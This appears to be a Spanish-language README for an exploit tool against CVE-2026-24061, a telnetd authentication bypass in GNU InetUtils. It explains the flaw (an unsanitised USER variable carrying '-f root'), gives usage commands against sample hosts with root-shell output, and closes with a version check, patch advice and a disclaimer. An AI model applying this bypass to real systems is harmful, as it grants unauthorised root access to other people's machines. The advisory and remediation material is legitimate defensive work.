
Exploit para CVE-2026-24061, una omisión crítica de autenticación remota en GNU InetUtils telnetd, que permite acceso root no autenticado mediante variables de entorno manipuladas.

CVE-2026-24061 es una vulnerabilidad crítica que afecta al servicio telnetd en GNU InetUtils.
Permite que un atacante remoto no autenticado inicie sesión como root explotando un manejo inadecuado de las variables de entorno pasadas al proceso de inicio de sesión del sistema.
Impacto: Compromiso total del sistema. Gravedad: 🔥 Crítica (CVSS 9.8)
telnetdSi telnet está habilitado en tu sistema y estás ejecutando estas versiones, eres vulnerable.
La variable de entorno USER no se sanitiza correctamente.
Un atacante puede pasar argumentos manipulados (por ejemplo, -f root) para omitir la autenticación por completo y obtener acceso root.
Sin credenciales. Sin interacción del usuario. Solo vibraciones — y son malas. 😬
Omisión básica de root:
python3 CVE-2026-24061.py 192.168.1.100
Puerto/usuario personalizado:
python3 CVE-2026-24061.py vulnerable-host --port 2323 --user bin
[+] Auth bypass succeeded! Dropping into interactive shell...root@vulnerable-host:~$ donde puedes ejecutar comandos (por ejemplo, id → uid=0(root)...)telnetd --version
Si la versión es ≤ 2.7, aplica el parche lo antes posible.
| Campo | Valor |
|---|---|
| CVE | CVE-2026-24061 |
| Gravedad | Crítica (9.8) |
| Tipo | Omisión de autenticación remota |
| Impacto | Acceso root |
| Solución | Parche / Desactivar telnet |
Esta información se proporciona únicamente con fines educativos y de seguridad defensiva. Los autores no aprueban ni respaldan el acceso no autorizado, la explotación o el uso indebido de sistemas.
Prueba y aplica siempre las prácticas de seguridad solo en sistemas que te pertenezcan o para los que tengas autorización explícita de evaluación. Úsalo con responsabilidad. Mantente ético. 🛡️